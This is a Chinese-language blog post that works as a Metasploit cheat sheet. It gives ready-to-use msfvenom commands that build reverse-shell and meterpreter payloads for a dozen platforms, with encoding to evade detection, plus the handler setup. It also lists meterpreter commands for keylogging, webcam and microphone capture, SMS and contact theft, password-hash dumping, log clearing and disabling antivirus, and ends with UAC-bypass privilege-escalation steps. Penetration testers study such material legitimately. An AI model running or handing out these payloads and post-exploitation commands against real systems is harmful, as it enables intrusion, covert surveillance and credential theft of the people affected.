Metasploit基础

主模块modules

  • auxiliary:辅助模块,辅助渗透(端口扫描、密码爆破、漏洞验证等)
  • exploits:漏洞利用模块,包含主流的漏洞利用脚本
  • payloads:攻击载荷,攻击成功后在目标机器执行的代码
  • post:后渗透阶段模块,漏洞利用获得meterpreter之后,向目标发送的一些功能性指令,如提权等
  • encoders:编码器模块,主要包含各种编码工具,对payload进行编码加密,以便绕过入侵检查和过滤系统
  • evasion:躲避模块,生成免杀payload
  • nops:调整shellcode前置nop指令长度的工具

msfvenom

常用于生成后门木马

常用参数功能
-l列出指定模块的所有可用资源,模块类型包括payloads,nops,encoders,all
-p指定需要使用的payload
-f指定输出格式,如exe、war、sh等
-e指定需要使用的encoder编码
-a指定payload的目标架构,如x86、x64、windows、java、linux
-o保存payload文件输出
-b设定规避字符集,如避免使用’\x00\xff’
-n为payload预先指定一个NOP滑动长度
-s设定生成payload的最大长度,即文件大小
-i指定payload的编码次数
-c指定一个附加的win32 shellcode文件
-x指定一个可执行文件作为模板,可将后门捆绑到正常程序上
-k保护模板程序的动作,注入的payload作为以一个新的进程运行
-v指定一个自定义的变量,确定输出格式

各平台生成payload命令

平台命令
Windowsmsfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 10 -f exe -o payload.exe
Macmsfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -f macho -o payload.macho
Androidmsfvenom -p android/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -o payload.apk
Powershellmsfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -f elf -o payload.elf
phpmsfvenom -p php/meterpreter_reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -f raw > shell.php
warmsfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -f raw - o payload.war
nodejsmsfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -f raw -o payload.js
pythonmsfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -f raw -o payload.py
luamsfvenom -p cmd/unix/reverse_lua LHOST=攻击机ip LPORT=攻击机监听端口 -f raw -o payload.lua
rubymsfvenom -p ruby/shell_reverse_tcp LHOST=攻击机ip LPORT=攻击机监听端口 -f raw -o payload.rb

msfconsole

scanner

查找主机探测模块:search scanner type:auxiliary

  • 基于ARP发现内网存活主机
    在这里插入图片描述
  • 基于UDP发现内网存活主机
    在这里插入图片描述
  • 基于smb发现内网存活主机
    在这里插入图片描述
  • 发现FTP服务
    在这里插入图片描述
  • 发现HTTP服务
    在这里插入图片描述

handler

使用监控模块:use exploit/multi/handler
设置payload:set payload {payload}
设置监听机ip:set lhost {ip}
设置监听端口:set lport {port}
以上设置需与msfvenom生成木马所使用的配置一致
检查选项配置:show options
开始监控:run

Meterpreter

Meterpreter作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后返回一个能控制的通道,可远程执行命令

基本命令

命令作用
background把meterpreter后台挂起
sessions -i恢复指定的meterpreter脚本
bgkill杀死一个meterpreter脚本
bglist提供所有正在运行的后台脚本的列表
bgrun后台执行meterpreter脚本
channel显示活动频道
close关闭通道
exit终止meterpreter会话
quit终止meterpreter会话
interact切换进一个信道
run执行meterpreter脚本
read从通道读取数据
write将数据写入到一个通道
irb进入 Ruby 脚本模式
use加载 meterpreter 的扩展

文件交互命令

命令作用
cat读取文件内容
cd切换靶机目录
cp复制文件到目标
mv移动到目标
chmod修改文件权限
del / rm删除靶机文件
dir打印靶机目录
mkdir在靶机上创建目录
rmdir删除靶机目录
edit编辑文件
getlwd打印本地目录
getwd打印靶机目录
lcd更改本地目录
lls列出本地目录
ls列出靶机文件目录
lpwd打印本地工作目录
pwd打印靶机工作目录
search搜索文件
upload本地传文件到靶机
download从靶机下载文件到本地

常用命令

Android常用命令

命令作用
dump_contacts获取通讯录
dump_sms获取短信记录
send_sms发送短信
geolocate获取GPS定位信息
wlan_geolocate获取Wi-Fi定位信息
record_mic录音
webcam_list获取相机设备
webcam_snap拍照
webcam_stream直播摄像头

windows常用命令

命令作用
sysinfo查看系统信息
route查看网络设置
getuid查看当前权限
getsystem自动提权
clearevSYSTEM权限下清除日志
screenshot截取屏幕图片
webcam_snap拍照
webcam_stream直播摄像头
record_mic录音
keyscan_start启动键盘记录
keyscan_dump导出键盘
keyscan_stop停止键盘记录
run hashdumpSYSTEM权限下导出当前用户密码哈希
run post/windows/gather/smart_hashdumpSYSTEM权限下导出SAM数据库中的本地用户账号
run getgui -u 用户名 -p 密码创建一个用户
run post/windows/gather/checkvm查看是否为虚拟机
run post/windows/manage/killav关闭杀毒软件
run post/windows/manage/enable_rdp启动远程桌面协议
run post/windows/gather/enum_logged_on_users列举当前登录的用户
run post/windows/gather/enum_applications查看安装的应用信息
run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码

msf模块提权(windows)

  1. 把当前权限不足的meterpreter挂起:background
  2. msfconsle中输入search bypassuac查看提权模块
  3. 选择一个适合当前系统的提权模块
    use exploit/windows/local/bypassuac_windows_store_reg
    use exploit/windows/local/bypassuac_sluihijack
    use exploit/windows/local/bypassuac_dotnet_profiler
  4. 配置模块使用参数:show options
  5. 配置session为挂起的meterpreter的id:set session id
  6. 执行提权:run
  7. 获取到meterpreter后,getuid 看提权是否成功,不成功则输入getsystem 获取权限
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值